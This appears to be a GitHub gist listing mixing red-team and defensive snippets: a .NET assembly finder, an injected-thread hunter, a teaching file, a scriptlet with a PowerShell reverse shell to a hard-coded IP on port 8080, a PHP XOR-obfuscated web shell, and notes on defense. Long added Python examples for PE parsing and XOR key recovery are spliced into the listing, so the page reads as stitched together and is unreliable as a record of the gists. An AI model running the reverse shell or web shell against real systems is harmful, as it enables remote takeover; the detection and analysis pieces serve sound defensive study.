Kiel Wadner kwadner

@kwadner
kwadner / Find-Assemblies.ps1
Created February 14, 2020 17:25 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
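What actually makes a file a .NET assembly, and what separates an IL-only assembly from a mixed one, can be checked by parsing the PE headers instead of loading the file: the optional header's data directory slot 14 points at the CLR runtime header, and that header's Flags word carries COMIMAGE_FLAGS_ILONLY, which mixed-mode (C++/CLI) assemblies leave clear. The following is an added example in Python, not code from the forked Find-Assemblies.ps1 gist; classify_pe, build_minimal_pe and find_assemblies are this example's own names, the default ".exe only" scope is an assumption read from the gist's "include DLLs" and "include all files" options, and the sample images are constructed in-line rather than real binaries.

```python
"""Classify a PE image as native, IL-only .NET or mixed-mode .NET by reading
the CLR runtime header (data directory 14) instead of loading the file.

Added example; not code from the forked Find-Assemblies.ps1 gist. Offsets follow
the PE/COFF and ECMA-335 IMAGE_COR20_HEADER layouts. build_minimal_pe() fabricates
tiny sample images for offline testing; they are constructed, not real binaries."""
import os
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR runtime header slot
COMIMAGE_FLAGS_ILONLY = 0x1                 # clear in mixed (C++/CLI) assemblies


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset through the section table."""
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_ptr
    return None


def classify_pe(data: bytes) -> str:
    """'not-pe', 'native', 'managed-ilonly', 'managed-mixed' or 'managed-unreadable'."""
    try:
        if len(data) < 0x40 or data[:2] != b"MZ":
            return "not-pe"
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return "not-pe"
        coff = e_lfanew + 4
        num_sections = struct.unpack_from("<H", data, coff + 2)[0]
        size_opt = struct.unpack_from("<H", data, coff + 16)[0]
        opt = coff + 20
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:                   # PE32
            dd_count_off, dd_off = opt + 92, opt + 96
        elif magic == 0x20B:                 # PE32+
            dd_count_off, dd_off = opt + 108, opt + 112
        else:
            return "not-pe"
        if struct.unpack_from("<I", data, dd_count_off)[0] <= IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
            return "native"                  # no CLR directory slot at all
        clr_rva, clr_size = struct.unpack_from("<II", data, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
        if clr_rva == 0 or clr_size == 0:
            return "native"                  # slot present but empty: unmanaged image
        sections = []
        for i in range(num_sections):        # 40-byte section headers follow the optional header
            vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + size_opt + 40 * i + 8)
            sections.append((vaddr, vsize, raw_ptr, raw_size))
        clr_off = _rva_to_offset(clr_rva, sections)
        if clr_off is None or clr_off + 20 > len(data):
            return "managed-unreadable"      # directory points outside the file: worth a look on its own
        flags = struct.unpack_from("<I", data, clr_off + 16)[0]   # IMAGE_COR20_HEADER.Flags
        return "managed-ilonly" if flags & COMIMAGE_FLAGS_ILONLY else "managed-mixed"
    except struct.error:
        return "not-pe"                      # truncated headers


def build_minimal_pe(clr_flags=None) -> bytes:
    """Constructed sample: a one-section PE32. clr_flags=None gives a native image,
    an int gives a managed image whose CLR header carries those Flags."""
    e_lfanew, size_opt, sect_rva, sect_raw = 0x40, 96 + 16 * 8, 0x1000, 0x200
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x2102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    if clr_flags is not None:
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, sect_rva, 72)
    section = bytearray(40)
    section[:8] = b".text\0\0\0"
    struct.pack_into("<IIII", section, 8, 0x200, sect_rva, 0x200, sect_raw)
    image = bytearray(sect_raw + 0x200)
    header = dos + b"PE\0\0" + coff + opt + section
    image[:len(header)] = header
    if clr_flags is not None:                             # IMAGE_COR20_HEADER at the section start
        struct.pack_into("<IHHIII", image, sect_raw, 72, 2, 5, sect_rva + 0x100, 0x100, clr_flags)
    return bytes(image)


def find_assemblies(directory, recurse=False, dlls=False, all_files=False):
    """Yield (path, verdict) for managed images; .exe by default, .dll with dlls=True,
    every file with all_files=True (scope assumed from the gist's option names)."""
    for root, _subdirs, files in os.walk(directory):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if all_files or ext == ".exe" or (dlls and ext == ".dll"):
                path = os.path.join(root, name)
                try:
                    with open(path, "rb") as fh:
                        verdict = classify_pe(fh.read())
                except OSError:
                    continue
                if verdict.startswith("managed"):
                    yield path, verdict
        if not recurse:
            break


if __name__ == "__main__":
    for p, v in find_assemblies(".", recurse=True, dlls=True):
        print(v, p)
```

Reading the header this way also avoids the failure mode of the reflection approach: nothing is loaded, so a hostile or architecture-mismatched image cannot run code or throw during the scan, and a CLR directory that points outside the file is reported rather than skipped.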
@kwadner
kwadner / Get-InjectedThread.ps1
Created February 13, 2020 17:23 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@kwadner
kwadner / temp.py
Last active January 27, 2020 16:55
temp python functions
# DO: Define all your functions at the top of your script file.
# DO: Use descriptive names for your functions
# DO: Provide a comment block describing what your function does
# DO: Document what is 'returned' from your function
# 1. Why do we need functions/ what are we trying to solve?
# 2. What is a function?
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
$socket = new-object System.Net.Sockets.TcpClient('52.234.133.119', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
<?php
$key_part_one = "5f4d";
$key_part_two = "cc3b";
/* This function is used to obfuscate the raw bytes of the request and the
response for the web shell. It operates as an XOR function on each byte.
The XOR key is the concat of the two key parts at the top of the script.
*/
function xor_obfuscation($data_bytes, $key)
{
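The XOR scheme that comment describes, as an added example in Python rather than the gist's PHP (none of this is the shell's own code): one function both encodes and decodes, and because the key is eight bytes and repeats, a responder holding a captured request and a guess at its first bytes can recover the key from traffic alone, without the script. Both sides hard-code the key, so this is obfuscation, not encryption. The example assumes the concatenated key "5f4dcc3b" is applied as its ASCII bytes (the fragment does not show whether the PHP hex-decodes it), and the sample request, its assumed "cmd=" prefix and the sample response are constructed.

```python
"""Repeating-key XOR as used by the web shell fragment above, plus known-plaintext
key recovery for a responder who only has captured traffic.

Added example, not the gist's code. Assumes the concatenated key is used as ASCII
bytes; sample messages are constructed."""

KEY_PART_ONE = "5f4d"
KEY_PART_TWO = "cc3b"
KEY = (KEY_PART_ONE + KEY_PART_TWO).encode("ascii")   # assumption: ASCII, not hex-decoded


def xor_obfuscation(data_bytes: bytes, key: bytes) -> bytes:
    """XOR each byte with the key byte at the same position modulo len(key).
    Applying it twice with the same key returns the original bytes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data_bytes))


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> bytes:
    """Recover a repeating key of length key_len from at least key_len bytes of
    known plaintext aligned at the start of the stream."""
    if len(known_plaintext) < key_len or len(ciphertext) < key_len:
        raise ValueError("need at least key_len bytes of aligned known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


def key_length_candidates(ciphertext: bytes, known_plaintext: bytes, max_len: int = 32) -> list:
    """Key lengths (at most half the known plaintext, so the key must repeat at
    least once) whose recovered key reproduces every known plaintext byte."""
    n = len(known_plaintext)
    hits = []
    for length in range(1, min(max_len, n // 2) + 1):
        k = recover_key(ciphertext, known_plaintext, length)
        if xor_obfuscation(ciphertext[:n], k) == known_plaintext:
            hits.append(length)
    return hits


# Constructed traffic: what the operator sends and what the shell returns.
SAMPLE_REQUEST = b"cmd=cat /etc/passwd"
SAMPLE_RESPONSE = b"root:x:0:0:root:/root:/bin/bash\n"


def responder_view(captured_request: bytes, captured_response: bytes) -> bytes:
    """Given both captured directions and the guess that requests start with
    'cmd=' (only 4 bytes, not enough for an 8-byte key), fall back to the full
    request as known plaintext once one command is recovered by other means, then
    decode the response."""
    try:
        recover_key(captured_request, b"cmd=", 8)   # raises: too little known plaintext
    except ValueError:
        pass
    length = key_length_candidates(captured_request, SAMPLE_REQUEST)[0]
    key = recover_key(captured_request, SAMPLE_REQUEST, length)
    return xor_obfuscation(captured_response, key)


if __name__ == "__main__":
    wire_req = xor_obfuscation(SAMPLE_REQUEST, KEY)
    wire_resp = xor_obfuscation(SAMPLE_RESPONSE, KEY)
    print(responder_view(wire_req, wire_resp).decode())
```

The period check in key_length_candidates is the step that matters in practice: a four-byte guess such as "cmd=" recovers only half the key, while any single fully known message longer than two key periods pins both the length and the key, after which every other captured exchange decodes with the same bytes.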
@kwadner
kwadner / gist:74f09077ffbe2bfd2863
Last active August 29, 2015 14:19
Thoughts on Defense

Proactive Response vs Reactive Response

  • A defensive posture is proactive, not reactive
  • Defensive actions must respond to the attacker

These two statements seem to contradict each other at first glance, but both are accurate. There is a difference in attitude and behavior between responding and reacting.

Falling Castles

The castle analogy does not hold up well; however, we spend more time looking inside the castle walls than outside.

Detection in Depth vs Defense in Depth